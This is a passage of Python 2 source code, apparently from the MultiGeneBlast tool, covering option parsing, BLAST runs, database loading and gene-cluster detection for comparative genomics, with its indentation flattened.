elif os.sep in opts.outputfolder and os.sep not in opts.outputfolder[0]:
opts.outputfolder = CURRENTDIR + os.sep + opts.outputfolder
else:
invalidoptions(i)
if os.path.exists(opts.outputfolder):
print "Warning: Overwriting existing folder"
for xhtmlfile in [filename for filename in os.listdir(opts.outputfolder) if "xhtml" in filename]:
os.remove(opts.outputfolder + os.sep + xhtmlfile)
outfolder = "y"
else:
try:
os.mkdir(opts.outputfolder)
except:
invalidoptions(i)
outfolder = "y"
elif i == "-db":
global MGBPATH
global DBPATH
value = value.partition(".pal")[0].partition(".nal")[0]
if sys.platform == ('win32') and os.sep not in value:
value = CURRENTDIR + os.sep + value
elif os.sep not in value or value[0] != os.sep:
value = CURRENTDIR + os.sep + value
if not value + ".pal" in os.listdir(MGBPATH) and not value + ".pal" in os.listdir(".") and not value + ".pal" in os.listdir(CURRENTDIR) and not (os.sep in value and os.path.exists(value.rpartition(os.sep)[0]) and value.rpartition(os.sep)[2] + ".pal" in os.listdir(value.rpartition(os.sep)[0])):
if not value + ".phr" in os.listdir(MGBPATH) and not value + ".phr" in os.listdir(".") and not (os.sep in value and os.path.exists(value.rpartition(os.sep)[0]) and value.rpartition(os.sep)[2] + ".phr" in os.listdir(value.rpartition(os.sep)[0])):
if not value + ".nal" in os.listdir(MGBPATH) and not value + ".nal" in os.listdir(".") and not value + ".nal" in os.listdir(CURRENTDIR) and not (os.sep in value and os.path.exists(value.rpartition(os.sep)[0]) and value.rpartition(os.sep)[2] + ".nal" in os.listdir(value.rpartition(os.sep)[0])):
if not value + ".nhr" in os.listdir(MGBPATH) and not value + ".nhr" in os.listdir(".") and not (os.sep in value and os.path.exists(value.rpartition(os.sep)[0]) and value.rpartition(os.sep)[2] + ".nhr" in os.listdir(value.rpartition(os.sep)[0])):
print "Error: Database not found; database should have accompanying .phr, .psq and .pin files."
invalidoptions(i)
opts.db = value
if value + ".pal" in os.listdir(MGBPATH) or value + ".nal" in os.listdir(MGBPATH):
DBPATH = MGBPATH
elif value + ".pal" in os.listdir(CURRENTDIR) or value + ".nal" in os.listdir(CURRENTDIR):
DBPATH = CURRENTDIR
elif value + ".pal" in os.listdir(".") or value + ".nal" in os.listdir("."):
DBPATH = os.getcwd()
elif os.sep in value and value[0] != os.sep and os.path.exists(os.getcwd() + os.sep + value.rpartition(os.sep)[0]) and ((value.rpartition(os.sep)[2] + ".pal" in os.listdir(os.getcwd() + os.sep + value.rpartition(os.sep)[0])) or (value.rpartition(os.sep)[2] + ".nal" in os.listdir(os.getcwd() + os.sep + value.rpartition(os.sep)[0]))):
DBPATH = os.getcwd() + os.sep + value.rpartition(os.sep)[0]
opts.db = value.rpartition(os.sep)[2]
elif os.sep in value and os.path.exists(value.rpartition(os.sep)[0]) and (value.rpartition(os.sep)[2] + ".pal" in os.listdir(value.rpartition(os.sep)[0]) or value.rpartition(os.sep)[2] + ".nal" in os.listdir(value.rpartition(os.sep)[0])):
DBPATH = value.rpartition(os.sep)[0]
opts.db = value.rpartition(os.sep)[2]
else:
print "Error: Database not found; database should have accompanying .phr, .psq and .pin or .nhr, .nsq and .nin files."
invalidoptions(i)
os.environ['BLASTDB'] = DBPATH
if opts.db + ".pal" in os.listdir(DBPATH):
opts.dbtype = "prot"
elif opts.db + ".nal" in os.listdir(DBPATH):
opts.dbtype = "nucl"
elif i == "-cores":
if value.isdigit() and int(value) in range(1,1000):
opts.cores = int(value)
else:
invalidoptions(i)
elif i == "-minseqcov":
if value.isdigit() and int(value) in range(0,100):
opts.minseqcov = int(value)
else:
invalidoptions(i)
elif i == "-minpercid":
if value.isdigit() and int(value) in range(0,100):
opts.minpercid = int(value)
else:
invalidoptions(i)
elif i == "-distancekb":
if value.isdigit() and int(value) in range(1,100):
opts.distancekb = int(value) * 1000
else:
print "Error: please select a number between 1-100."
invalidoptions(i)
elif i == "-syntenyweight":
if (value.isdigit() or (value.count(".") == 1 and value.partition(".")[0].isdigit() and value.partition(".")[2].isdigit())) and float(value) <= 2.0 and float(value) >= 0.0:
opts.syntenyweight = float(value)
else:
print "Error: please select a number between 0.0 and 2.0."
invalidoptions(i)
elif i == "-hitspergene":
if value.isdigit() and int(value) in range(50,10001):
opts.hitspergene = int(value)
else:
print "Error: please select a number between 50-10000."
invalidoptions(i)
elif i == "-muscle":
if value == "y" or value == "n":
opts.muscle = value
else:
invalidoptions(i)
elif i == "-outpages":
if value.isdigit() and int(value) in range(0,41):
opts.pages = int(value)
else:
print "Error: please select a number between 0-40."
invalidoptions(i)
else:
invalidoptions(i)
    #Stop the process if options incompatible with a FASTA input file (architecture search) are provided
if fastafile == "y" and (genes_tag_used == "y" or fromto_tag_used == "y"):
print "Error: -from, -to and -genes tags are incompatible with architecture search (FASTA input)"
sys.exit(1)
#Stop process if inadequate options are supplied.
if infile == "n" or ("n" in [startpos, endpos] and ingenes == "n" and ".fa" not in opts.infile.partition(".")[1] + opts.infile.partition(".")[2]) or outfolder == "n":
print "Input error. An input file, an outputfolder and a query region (for EMBL/GBK inputs) must be supplied."
invalidoptions(" ".join(options))
def parse_options(args, opts):
#Run GUI if no arguments supplied
if len(args) < 2:
args = "-h"
default_options(opts)
#Read user-specified options which may override defaults
if len(args) >= 2:
options = args
if "-" in options[-1] and (args[1] != "-help" and args[1] != "--help" and args[1] != "-h"):
invalidoptions(options[-1])
identifiers = collect_identifiers(options)
process_identifiers(identifiers, opts, options)
nrcpus = determine_cpu_nr(opts.cores)
opts.nrcpus = nrcpus
def generate_architecture_data(fastafile):
try:
file = open(fastafile,"r")
except:
log("Error: no or invalid input file: " + fastafile, exit=True)
filetext = file.read()
filetext = filetext.replace("\r","\n")
fasta_entries = [">" + entry.replace("\n\n","\n").replace("\n\n","\n") for entry in filetext.split(">")][1:]
querytags = []
seqs = []
seqlengths = {}
seqdict = {}
for entry in fasta_entries:
if "\n" not in entry or len(entry.partition("\n")[2]) < 2:
log("FASTA file wrongly formatted at. Please check your input file.")
log("Wrong entry: " + entry.replace("\n",""), exit=True)
fname = entry.partition("\n")[0][1:]
#Generate name without forbidden characters
forbiddencharacters = ["'",'"','=',';',':','[',']','>','<','|','\\',"/",'*','-','_','.',',','?',')','(','^','#','!','`','~','+','{','}','@','$','%','&']
fname_censored = ""
for z in fname:
if z not in forbiddencharacters:
fname_censored = fname
fname = fname_censored.replace(" ","_")[:20].replace('|','_')
seq = entry.partition("\n")[2].replace(" ","").replace("\n","")
if fname in querytags:
log("Non-unique sequence name in input FASTA file. Please reformat and try again.", exit=True)
querytags.append(fname)
seqs.append(seq)
seqlengths[fname] = len(seq)
seqdict[fname] = seq
#Determine alignment distribution / lengths for display in SVG to put in names as pseudo-locations
names = []
genedict = {}
accessiondict = {}
totalnt = 0
for tag in querytags:
startsite = str(totalnt)
fname = "input|c1|" + startsite
totalnt += (seqlengths[tag] * 3)
endsite = str(totalnt)
fname = fname + "-" + endsite + "|+|" + tag + "|" + tag + "|" + tag + "|" + tag
seqlengths[fname] = seqlengths[tag]
totalnt += 100
names.append(fname)
accessiondict[tag] = tag
genedict[tag] = [startsite, endsite, "+", tag, seqdict[tag], tag, tag]
genelist = names
proteins = [names, seqs, genelist, genedict, accessiondict]
return proteins, querytags, seqdict, names, seqs
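# Illustrative example of the pseudo-locations built above (hypothetical input): a first
# query protein of 300 aa with FASTA header "tagA" is renamed to
#   "input|c1|0-900|+|tagA|tagA|tagA|tagA"
# (protein length * 3 nt), and the next entry starts 100 nt further along, so the
# downstream cluster-drawing code can treat architecture queries like a real gene cluster.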
def parse_absolute_paths(infile):
#Parse absolute paths if found
originalfilename = infile
if "/" in infile or "\\" in infile:
lastpos = max([infile.rfind("\\"),infile.rfind("/")])
originpath = infile[:(lastpos + 1)]
infile = infile[(lastpos + 1):]
#if os.getcwd() != originalfilename[:lastpos] and os.getcwd() != originalfilename[:lastpos].replace("/","\\"):
# shutil.copyfile(originalfilename, infile)
return infile
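# Example (hypothetical paths): parse_absolute_paths("/home/user/data/query.gbk") returns
# "query.gbk", while a bare file name such as "query.gbk" is returned unchanged.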
def read_input_file(infile, startpos, endpos, ingenes, gui, outbox=None, frame=None):
global GUI
GUI = gui
global OUTBOX
OUTBOX = outbox
global FRAME
FRAME = frame
log("Reading and parsing input GenBank file...")
#infile = parse_absolute_paths(infile)
ext = infile.rpartition(".")[2]
if ext.lower() in ["gbk","gb","genbank"]:
proteins = gbk2proteins(infile)
elif ext.lower() in ["embl","emb"]:
proteins = embl2proteins(infile)
elif ext.lower() in ["fasta","fas","fa","fna"]:
nucname = "Architecture Search FASTA input"
genomic_accnr = ""
dnaseqlength = 0
proteins, querytags, seqdict, names, seqs = generate_architecture_data(infile)
writefasta(names,seqs,"query.fasta")
arch_search = "y"
return proteins, genomic_accnr, dnaseqlength, nucname, querytags, names, seqs, seqdict, arch_search
arch_search = "n"
genomic_accnr = proteins[1]
dnaseqlength = proteins[2]
nucname = proteins[3]
proteins = proteins[0]
querytags = []
z = 0
names = []
seqs = []
seqdict = {}
if startpos != "N/A" and endpos != "N/A":
for i in proteins[0]:
seq = proteins[1][z]
pstartpos = int(i.split("|")[2].split("-")[0])
pendpos = int(i.split("|")[2].split("-")[1])
if (pstartpos > startpos and pstartpos < endpos) or (pendpos > startpos and pendpos < endpos):
names.append(i)
seqs.append(seq)
seqdict[i] = seq
querytags.append(i.split("|")[4])
z += 1
if len(names) == 0:
log("Error: no genes found within the specified region of the input file.", exit=True)
elif ingenes != "N/A":
for i in proteins[0]:
seq = proteins[1][z]
if i.split("|")[4] in ingenes or i.split("|")[6] in ingenes or i.split("|")[6].partition(".")[0] in ingenes or i.split("|")[6].partition(".")[0] in [gene.partition(".")[0] for gene in ingenes] or i.split("|")[7] in ingenes:
names.append(i)
seqs.append(seq)
seqdict[i] = seq
querytags.append(i.split("|")[4])
z += 1
if len(names) == 0:
log("Error: no genes found with these names in the input file.", exit=True)
writefasta(names,seqs,"query.fasta")
return proteins, genomic_accnr, dnaseqlength, nucname, querytags, names, seqs, seqdict, arch_search
def internal_blast(minseqcoverage, minpercidentity, names, proteins, seqdict, nrcpus):
    #BLAST each cluster's proteins against themselves to find internal homologs; store groups of homologs (including singletons) per cluster as a list of lists
log("Finding internal homologs..")
internalhomologygroupsdict = {}
clusternumber = 1
#Make Blast db for internal search
makeblastdbcommand = "makeblastdb -in query.fasta -out query.fasta -dbtype prot"
makeblastdb_stdout = os.popen4(makeblastdbcommand)
makeblastdb_stdout = makeblastdb_stdout[1].read()
z = 0
while "error" in makeblastdb_stdout.lower():
log(makeblastdb_stdout)
log("Error running BLAST. Retrying...")
makeblastdb_stdout = os.popen4(makeblastdbcommand)
makeblastdb_stdout = makeblastdb_stdout[1].read()
if z > 2:
log("Error generating internal Blast database, exiting. Please check your system.", exit=True)
z += 1
#Run and parse BLAST search
blastsearch = "blastp -db query.fasta -query query.fasta -outfmt 6 -max_target_seqs 1000 -evalue 1e-05 -out internal_input.out -num_threads " + str(nrcpus)
blast_stdout = os.popen4(blastsearch)
blast_stdout = blast_stdout[1].read()
z = 0
while "error" in blast_stdout.lower():
log(blast_stdout)
log("Error running BLAST. Retrying...")
blast_stdout = os.popen4(blastsearch)
blast_stdout = blast_stdout[1].read()
if z > 2:
log("Error running Blast, exiting. Please check your system.", exit=True)
z += 1
blastoutput = open("internal_input.out","r").read()
seqlengths = fastaseqlengths(proteins)
iblastinfo = blastparse(blastoutput, minseqcoverage, minpercidentity, seqlengths, seqdict, "internal", "prot")
iblastdict = iblastinfo[0]
#find and store internal homologs
groups = []
for j in names:
frame_update()
if iblastdict.has_key(j):
hits = iblastdict[j][0]
group = []
for k in hits:
if k[:2] == "h_":
group.append(k[2:])
elif k.count("|") > 4:
group.append(k.split("|")[4])
else:
group.append(k)
if j.split("|")[4] not in group:
group.append(j.split("|")[4])
x = 0
for l in groups:
for m in group:
if m in l:
del groups[x]
for n in l:
if n not in group:
group.append(n)
break
x += 1
group.sort()
groups.append(group)
else:
groups.append([j.split("|")[4]])
internalhomologygroupsdict[clusternumber] = groups
return internalhomologygroupsdict, seqlengths
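# Illustrative shape of the returned data (hypothetical gene names):
#   internalhomologygroupsdict == {1: [["geneA", "geneB"], ["geneC"]]}
# i.e. one entry per query cluster holding groups of mutually homologous query genes,
# with genes lacking internal homologs kept as single-element groups; seqlengths maps
# each query protein to its sequence length for the coverage cutoffs used in blastparse.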
def runblast(args, dbtype):
#return ##CAN BE UNCOMMENTED TEMPORARILY FOR FAST TESTING
if dbtype == "prot":
blastsearch = "blastp " + args
else:
blastsearch = "tblastn " + args
blast_stdout = os.popen4(blastsearch)
blast_stdout = blast_stdout[1].read()
z = 0
while "error" in blast_stdout.lower():
print blast_stdout
print "Error running BLAST. Retrying..."
blast_stdout = os.popen4(blastsearch)
blast_stdout = blast_stdout[1].read()
if z > 2:
print "Error running Blast, exiting. Please check your system."
sys.exit(1)
z += 1
def db_blast(names, seqs, db, nrcpus, hitspergene, dbtype="prot"):
##Run BLAST on genbank_mf database
log("Running NCBI BLAST+ searches on GenBank database..")
queryclusternames = names
queryclusterseqs = seqs
writefasta(queryclusternames,queryclusterseqs,"input.fasta")
#blastsearch = "blastp -db " + db + " -query input.fasta -outfmt 6 -max_target_seqs 1000 -num_descriptions 1000 -num_alignments 500 -evalue 1e-05 -out input.out -num_threads " + str(nrcpus)
#blast_stdout = os.popen4(blastsearch) ##CAN BE COMMENTED OUT TEMPORARILY FOR FAST TESTING
#blast_stdout = blast_stdout[1].read()
#z = 0
#while "error" in blast_stdout.lower():
# log(blast_stdout)
# log("Error running BLAST. Retrying...")
# blast_stdout = os.popen4(blastsearch) ##CAN BE COMMENTED OUT TEMPORARILY FOR FAST TESTING
# blast_stdout = blast_stdout[1].read()
# if z > 2:
# log("Error running Blast, exiting. Please check your system.", exit=True)
# z += 1
args = "-db " + db + " -query input.fasta -outfmt 6 -max_target_seqs " + str(hitspergene) + " -evalue 1e-05 -out input.out -num_threads " + str(nrcpus)
mgbprocess = Process(target=runblast, args=[args, dbtype])
mgbprocess.start()
while True:
processrunning = "n"
if mgbprocess.is_alive():
processrunning = "y"
if processrunning == "y" and GUI == "y":
FRAME.update()
elif processrunning == "y":
pass
else:
break
try:
blastoutputfile = open("input.out","r")
except:
log("Error while execution NCBI Blast: no output file generated", exit=True)
blastoutput = blastoutputfile.read()
blastoutputfile.close()
return blastoutput
def parse_blast(blastoutput, minseqcoverage, minpercidentity, seqlengths, seqdict, dbname, dbtype):
#Read BLAST output and parse
log("Blast search finished. Parsing results...")
blastinfo = blastparse(blastoutput, minseqcoverage, minpercidentity, seqlengths, seqdict, dbname, dbtype)
blastdict = blastinfo[0]
if len(blastdict.keys()) == 0:
log("No BLAST hits found above significance tresholds. Exiting MultiGeneBlast...", exit=True)
querylist = blastinfo[1]
return blastdict, querylist
def frame_update():
if GUI == "y":
global FRAME
FRAME.update()
def load_genecluster_info(dbname, allgenomes):
#Load gene cluster info to memory
DBPATH = os.environ['BLASTDB']
clusters = {}
allgenomes_tags = [genomename[:6] for genomename in allgenomes]
for i in fileinput.input(DBPATH + os.sep + dbname + "_all_descrs.txt"):
tabs = i.split("\t")
if len(tabs) > 0 and (tabs[0] in allgenomes or tabs[0] in allgenomes_tags):
accession = tabs[0]
clusterdescription = tabs[1]
clusters[accession] = clusterdescription
nucdescriptions = clusters
frame_update()
return nucdescriptions, clusters
class ProteinInfo(object):
__slots__ = ['genome', 'pstart', 'pend', 'strand', 'annotation', 'locustag']
def __init__(self, genome, pstart, pend, strand, annotation, locustag):
self.genome = genome
if pstart.isdigit():
self.pstart = int(pstart)
if pend.isdigit():
self.pend = int(pend)
if strand == "+":
self.strand = 1
else:
self.strand = -1
self.annotation = annotation
self.locustag = locustag
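# Minimal illustrative instantiation (hypothetical values); start/end are parsed from
# strings and the strand is stored as +1 / -1:
#   info = ProteinInfo("NC_000001", "1200", "2400", "+", "hypothetical protein", "locus_0001")
#   info.pstart == 1200 and info.strand == 1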
def load_dbproteins_info(querylist, blastdict, dbname):
##Load needed gene cluster database proteins info into memory
global DBPATH
DBPATH = os.environ['BLASTDB']
allhitprots = []
nucdict = {}
temp_proteininfo = {}
proteininfo = {}
for i in querylist:
if blastdict.has_key(i):
subjects = blastdict[i][0]
for j in subjects:
if j not in allhitprots:
allhitprots.append(j)
allhitprots.sort()
allgenomes = []
proteininfo_archive = tarfile.open(DBPATH + os.sep + dbname + ".pinfo.tar")
same = "n"
next_idx = 0
for j in allhitprots:
next_idx += 1
frame_update()
if same == "n":
try:
infofile = proteininfo_archive.extractfile("proteininfo/" + j[:4].upper() + ".pickle")
proteininfodict = pickle.load(infofile)
except:
log(j[:4].upper() + ".pickle" + " missing in proteininfo tar")
continue ##########THIS NEEDS TO BE FIXED IN THE DB TO PREVENT THIS ERROR / MAKE THIS UNNECESSARY
if not proteininfodict.has_key(j):
log(j + " missing in proteininfodict")
continue ##########THIS NEEDS TO BE FIXED IN THE DB TO PREVENT THIS ERROR / MAKE THIS UNNECESSARY
pinfo = str(proteininfodict[j])
#Fix for 'stuttering' of nucl accession number
if pinfo.count(pinfo.split("|")[0] + "|") > 1 and pinfo.split("|")[0] != "":
log("Correcting" + j + ":\n" + str(pinfo) + "\n" + pinfo.split("|")[0] + "|" + pinfo.rpartition(pinfo.split("|")[0])[2])
pinfo = pinfo.split("|")[0] + "|" + pinfo.rpartition(pinfo.split("|")[0])[2]
#Fix for faulty coordinates
if not pinfo.split("|")[1].replace("-","").isdigit():
if pinfo.split("|")[1].replace("-","").replace(")","").isdigit():
pinfo = pinfo.split("|")[0] + "|" + pinfo.split("|")[1].replace(")","") + "|" + "|".join(pinfo.split("|")[2:])
if "," in pinfo.split("|")[1].replace("-",""):
pinfo = pinfo.split("|")[0] + "|" + pinfo.split("|")[1].partition(",")[0] + "-" + pinfo.split("|")[1].rpartition("-")[2] + "|" + "|".join(pinfo.split("|")[2:])
if "|" not in str(pinfo) or pinfo.split("|")[0] == "":
log("DNA accession number missing for " + j + "\n" + str(pinfo))
continue ##########THIS NEEDS TO BE FIXED IN THE DB TO PREVENT THIS ERROR / MAKE THIS UNNECESSARY
tabs = pinfo.split("|")
if len(tabs) < 4:
log("Faulty info for " + j + ":\n" + str(pinfo))
continue
if "-" not in tabs[1] and "-" in tabs[2]:
del tabs[1]
protein = tabs[3]
genome = tabs[0]
location = tabs[1]
strand = tabs[2]
annotation = tabs[4]
locustag = tabs[5]
pstart = location.partition("-")[0]
pend = location.partition("-")[2]
if not pend.isdigit():
pend = str(int(pstart) + 100)
if genome not in allgenomes:
allgenomes.append(genome)
temp_proteininfo[genome] = [j, ProteinInfo(genome,pstart,pend,strand,annotation,locustag)]
else:
if temp_proteininfo.has_key(genome):
old_entry = temp_proteininfo[genome]
proteininfo[old_entry[0]] = old_entry[1]
nucdict[old_entry[0]] = old_entry[1].genome
del temp_proteininfo[genome]
proteininfo[j] = ProteinInfo(genome,pstart,pend,strand,annotation,locustag)
nucdict[j] = genome
if not (len(allhitprots) > next_idx and j[:4] == allhitprots[next_idx][:4]):
infofile.close()
same = "n"
else:
same = "y"
lasthitprot = j
proteininfo_archive.close()
allgenomes.sort()
return allgenomes, nucdict, proteininfo
def load_ndb_info(querylist, blastdict, dbname):
##Load needed gene cluster database proteins info into memory
global DBPATH
DBPATH = os.environ['BLASTDB']
allhitprots = []
nucdict = {}
proteininfo = {}
for i in querylist:
if blastdict.has_key(i):
subjects = blastdict[i][0]
for j in subjects:
if j not in allhitprots:
allhitprots.append(j)
genome = j.rpartition("_")[0]
pstart = min([blastdict[i][1][j][4],blastdict[i][1][j][5]])
pend = max([blastdict[i][1][j][4],blastdict[i][1][j][5]])
if int(blastdict[i][1][j][5]) > int(blastdict[i][1][j][4]):
strand = "+"
else:
strand = "-"
annotation = "tblastn hit"
locustag = "tblastn_hit_" + j.rpartition("_")[2]
proteininfo[j] = ProteinInfo(genome,pstart,pend,strand,annotation,locustag)
allhitprots.sort()
allgenomes = []
frame_update()
for j in allhitprots:
genome = j.rpartition("_")[0]
if genome not in allgenomes:
allgenomes.append(genome)
nucdict[j] = genome
allgenomes.sort()
return allgenomes, nucdict, proteininfo
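# Illustrative example (hypothetical hit identifier): for a nucleotide-database hit named
# "NC_003888_17" the genome becomes "NC_003888", the locus tag "tblastn_hit_17", and the
# start, end and strand are derived from the tblastn HSP coordinates stored in blastdict.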
def load_other_genes(allgenomes, proteininfo, dbname, blastdict):
#Add all other genes from same genomes to proteininfo
global DBPATH
DBPATH = os.environ['BLASTDB']
genecords_archive = tarfile.open(DBPATH + os.sep + dbname + ".cords.tar")
same = "n"
for i in allgenomes:
frame_update()
if same == "n":
infofile = genecords_archive.extractfile("genecords/" + i[:5].upper() + ".pickle")
genecordsdict = pickle.load(infofile)
genecords = genecordsdict[i]
genomeprotpositions = [proteininfo[prot].pstart for prot in proteininfo.keys() if i == proteininfo[prot].genome]
genomeprotpositions.extend([proteininfo[prot].pend for prot in proteininfo.keys() if i == proteininfo[prot].genome])
blastsubjects = [item for sublist in [blastdict[key][0] for key in blastdict.keys()] for item in sublist]
for j in genecords:
if j.count(j.split("|")[0]) > 1:
                j = j.split("|")[0] + "|" + j.rpartition(j.split("|")[0])[2]
if "|" in j:
tabs = j.split("|")
if "-" not in tabs[1] and "-" in tabs[2]:
del tabs[1]
protein = tabs[3]
genome = tabs[0]
location = tabs[1]
strand = tabs[2]
annotation = tabs[4]
locustag = tabs[5]
pstart = location.partition("-")[0]
pend = location.partition("-")[2]
if not pstart.isdigit():
pstart = 0
pend = 0
elif not pend.isdigit():
pend = str(int(pstart) + 100)
gene_is_close_to_hit = False
for position in genomeprotpositions:
if abs(int(pstart) - position) < 20000:
gene_is_close_to_hit = True
if not gene_is_close_to_hit and protein not in blastsubjects:
if not (len(allgenomes) > (allgenomes.index(i) + 1) and i[:5] == allgenomes[allgenomes.index(i) + 1][:5]):
infofile.close()
same = "n"
else:
same = "y"
continue
if not proteininfo.has_key(protein):
proteininfo[protein] = ProteinInfo(genome,pstart,pend,strand,annotation,locustag)
correct = "n"
z = 0
while correct == "n" and z < 2:
try:
number = 1 + int(proteininfo[protein].pstart)
number = 1 + int(proteininfo[protein].pend)
correct = "y"
except:
j = j.rpartition(genome)[1] + j.rpartition(genome)[2]
tabs = j.split("|")
protein = tabs[3]
genome = tabs[0]
location = tabs[1]
strand = tabs[2]
annotation = tabs[4]
locustag = tabs[5]
proteininfo[protein] = ProteinInfo(genome,location.partition("-")[0],location.partition("-")[2],strand,annotation,locustag)
z += 1
if not (len(allgenomes) > (allgenomes.index(i) + 1) and i[:5] == allgenomes[allgenomes.index(i) + 1][:5]):
infofile.close()
same = "n"
else:
same = "y"
genecords_archive.close()
return proteininfo
def load_databases(querylist, blastdict, processnr, dbname, dbtype):
#Load GenBank positional info into memory
log("Loading GenBank positional info into memory...")
if dbtype == "prot":
allgenomes, nucdict, proteininfo = load_dbproteins_info(querylist, blastdict, dbname)
proteininfo = load_other_genes(allgenomes, proteininfo, dbname, blastdict)
else:
allgenomes, nucdict, proteininfo = load_ndb_info(querylist, blastdict, dbname)
nucdescriptions, clusters = load_genecluster_info(dbname, allgenomes)
return nucdescriptions, nucdict, proteininfo
def find_hits_positions(blastdict, proteininfo, querylist):
#Find db xrefs, start positions, end positions, strand info for each hit and add to blast dict
log("Finding gene info of all hit genes...")
frame_update()
blastdict2 = {}
for i in querylist:
if blastdict.has_key(i):
subjects = blastdict[i][0]
subjects2 = []
querydict = blastdict[i][1]
querydict2 = {}
for j in subjects:
#genome_acc = nucdict[j]
#geneinfo = [start,end,strand,annotation,sequence,accnr,genername]
#blastparse = [perc_ident,blastscore,perc_coverage,evalue]
#goal = [subject_genecluster,subject_start,subject_end,subject_strand,subject_annotation,perc_ident,blastscore,perc_coverage,evalue,locustag]
#goal now = [subject_start,subject_end,subject_strand,subject_annotation,perc_ident,blastscore,perc_coverage,evalue,locustag]
if proteininfo.has_key(j):
oldblastdictinfo = querydict[j]
if proteininfo[j].strand == 1:
strand = "+"
else:
strand = "-"
newblastdictinfo = [proteininfo[j].genome, proteininfo[j].pstart, proteininfo[j].pend, strand, proteininfo[j].annotation] + oldblastdictinfo + [j]
querydict2[j] = newblastdictinfo
subjects2.append(j)
else:
print "WARNING:", j, "accession number not taken into account; data entry invalid."
blastdict2[i] = [subjects2,querydict2]
blastdict = blastdict2
return blastdict
def sort_genes_per_nucleotide(querylist, blastdict, nucdict):
log("Locating gene clusters on nucleotide scaffolds...")
frame_update()
universalquerydict = {}
for i in querylist:
if blastdict.has_key(i):
querydict = blastdict[i][1]
universalquerydict.update(querydict)
#Make dictionary that sorts all hit genes per nucleotide scaffold
sourcedict = {}
source2dict = {}
multiplelist = []
multiplehitlist = []
nucdictkeys = nucdict.keys()
nucdictkeys.sort()
for j in nucdict.keys():
nucsource = nucdict[j]
if source2dict.has_key(nucsource):
if nucsource not in multiplelist:
multiplehitlist.append(source2dict[nucsource][0])
multiplelist.append(nucsource)
if j not in multiplehitlist:
multiplehitlist.append(j)
sourcedict[nucsource] = source2dict[nucsource] + [j]
else:
sourcedict[nucsource].append(j)
if j not in multiplehitlist:
multiplehitlist.append(j)
else:
source2dict[nucsource] = [j]
return sourcedict, multiplehitlist, universalquerydict
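# Illustrative result (hypothetical accessions): if hit proteins "prot1" and "prot2" both
# map to scaffold "NC_003888" while "prot3" is the only hit on "NC_014318", then
#   sourcedict == {"NC_003888": ["prot1", "prot2"]} and multiplehitlist == ["prot1", "prot2"]
# Scaffolds carrying a single hit remain in source2dict only and are not clustered further.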
def find_geneclusters(sourcedict, universalquerydict, allowedgenedistance, nucdescriptions, proteininfo, dnaseqlength):
#For every genomic scaffold, find gene clusters based on positions and save gene-cluster links in dictionary
clusters = {}
clusterdict = {}
geneposdict = {}
hitclusters = []
extraspace = 20000
if int(dnaseqlength) / 2 > 20000:
extraspace = int(int(dnaseqlength) / 2)
if extraspace > int(allowedgenedistance):
extraspace = int(allowedgenedistance)
nuccodes = dict.fromkeys(sourcedict.keys()).keys()
for i in nuccodes:
frame_update()
extragenes = []
for j in proteininfo.keys():
if i == proteininfo[j].genome:
extragenes.append(j)
scaffoldgenes = sourcedict[i]
nuc_acc = i
protstartlocations = []
protendlocations = []
for j in scaffoldgenes:
startpos = int(universalquerydict[j][1])
endpos = int(universalquerydict[j][2])
if startpos > endpos:
startpos, endpos = endpos, startpos
protstartlocations.append(startpos)
protendlocations.append(endpos)
geneposdict[j] = [startpos,endpos]
protstartlocations.sort()
protendlocations.sort()
nrlocations = len(protstartlocations)
a = 0
clusterstarts = []
clusterends = []
for j in protstartlocations:
if a == 0:
cstart = str(int(j) - extraspace)
if int(cstart) < 0:
cstart = "0"
clusterstarts.append(cstart)
if len(protendlocations) == 1:
clusterends.append(str(int(protendlocations[a]) + extraspace))
elif a == nrlocations - 1:
if j < ((protendlocations[a - 1]) + allowedgenedistance):
clusterends.append(str(int(protendlocations[a]) + extraspace))
else:
cend = str(int(protendlocations[a - 1]) + extraspace)
clusterends.append(cend)
cstart = str(int(j) - extraspace)
if int(cstart) < 0:
cstart = "0"
clusterstarts.append(cstart)
clusterends.append(str(protendlocations[a]))
else:
if j > ((protendlocations[a - 1]) + allowedgenedistance):
clusterends.append(str(int(protendlocations[a - 1]) + extraspace))
cstart = str(j - extraspace)
if int(cstart) < 0:
cstart = "0"
clusterstarts.append(cstart)
else:
pass
a += 1
geneclusternumber = 0
for j in clusterstarts:
geneclustername = nuc_acc + "_" + str(geneclusternumber)
if geneclustername not in hitclusters:
hitclusters.append(geneclustername)
cstart = int(j)
cend = int(clusterends[geneclusternumber])
clustergenes = []
clustergenesdict = {}
geneclusternumber += 1
for k in scaffoldgenes:
startpos = int(geneposdict[k][0])
endpos = int(geneposdict[k][1])
if (startpos >= cstart and startpos <= cend) or (endpos >= cstart and endpos <= cend):
clusterdict[k] = geneclustername
clustergenes.append(k)
clustergenesdict[k] = startpos
for j in extragenes:
if (int(proteininfo[j].pstart) >= cstart and int(proteininfo[j].pstart) <= cend) or (int(proteininfo[j].pend) >= cstart and int(proteininfo[j].pend) <= cend):
if j not in clustergenes:
clustergenes.append(j)
clustergenesdict[j] = int(proteininfo[j].pstart)
nucdescription = ""
for i in nucdescriptions.keys():
if i in nuc_acc.split(".")[0]:
nucdescription = nucdescriptions[i]
break
clustergenes = sortdictkeysbyvalues(clustergenesdict)
clusters[geneclustername] = [clustergenes,nucdescription]
return clusterdict, geneposdict, hitclusters, clusters
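# Illustrative naming (hypothetical accession): the first and second candidate loci found
# on scaffold "NC_003888" are keyed "NC_003888_0" and "NC_003888_1"; clusters maps each
# such key to [genes_sorted_by_start, nucleotide_description] and clusterdict maps every
# hit gene back to the locus it belongs to.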
def update_blastdict(blastdict, querylist, clusterdict, multiplehitlist):
#Update blastdict
blastdict2 = {}
frame_update()
for i in querylist:
if blastdict.has_key(i):
subjects = blastdict[i][0]
querydict = blastdict[i][1]
querydict2 = {}
multiplehitlistsubjects = "n"
for j in subjects:
if j in multiplehitlist:
multiplehitlistsubjects = "y"
geneclustername = clusterdict[j]
oldblastdictinfo = querydict[j][1:]
newblastdictinfo = [geneclustername] + oldblastdictinfo
querydict2[j] = newblastdictinfo
if multiplehitlistsubjects == "y":
blastdict2[i] = [subjects,querydict2]
else:
blastdict2[i] = [[],{}]
blastdict = blastdict2
return blastdict
def find_genomic_loci(blastdict, nucdict, proteininfo, allowedgenedistance, querylist, nucdescriptions, dnaseqlength):
##In Genbank files, locate clusters of hits within 20 kb distance using new info from blastdict
##Save clusters and sort first based on nr query genes having homologs in them, second based on cumulative BLAST bit score; update blastdict with cluster ID
#Write dictionary with genes and positions for all nucleotide scaffolds
blastdict = find_hits_positions(blastdict, proteininfo, querylist)
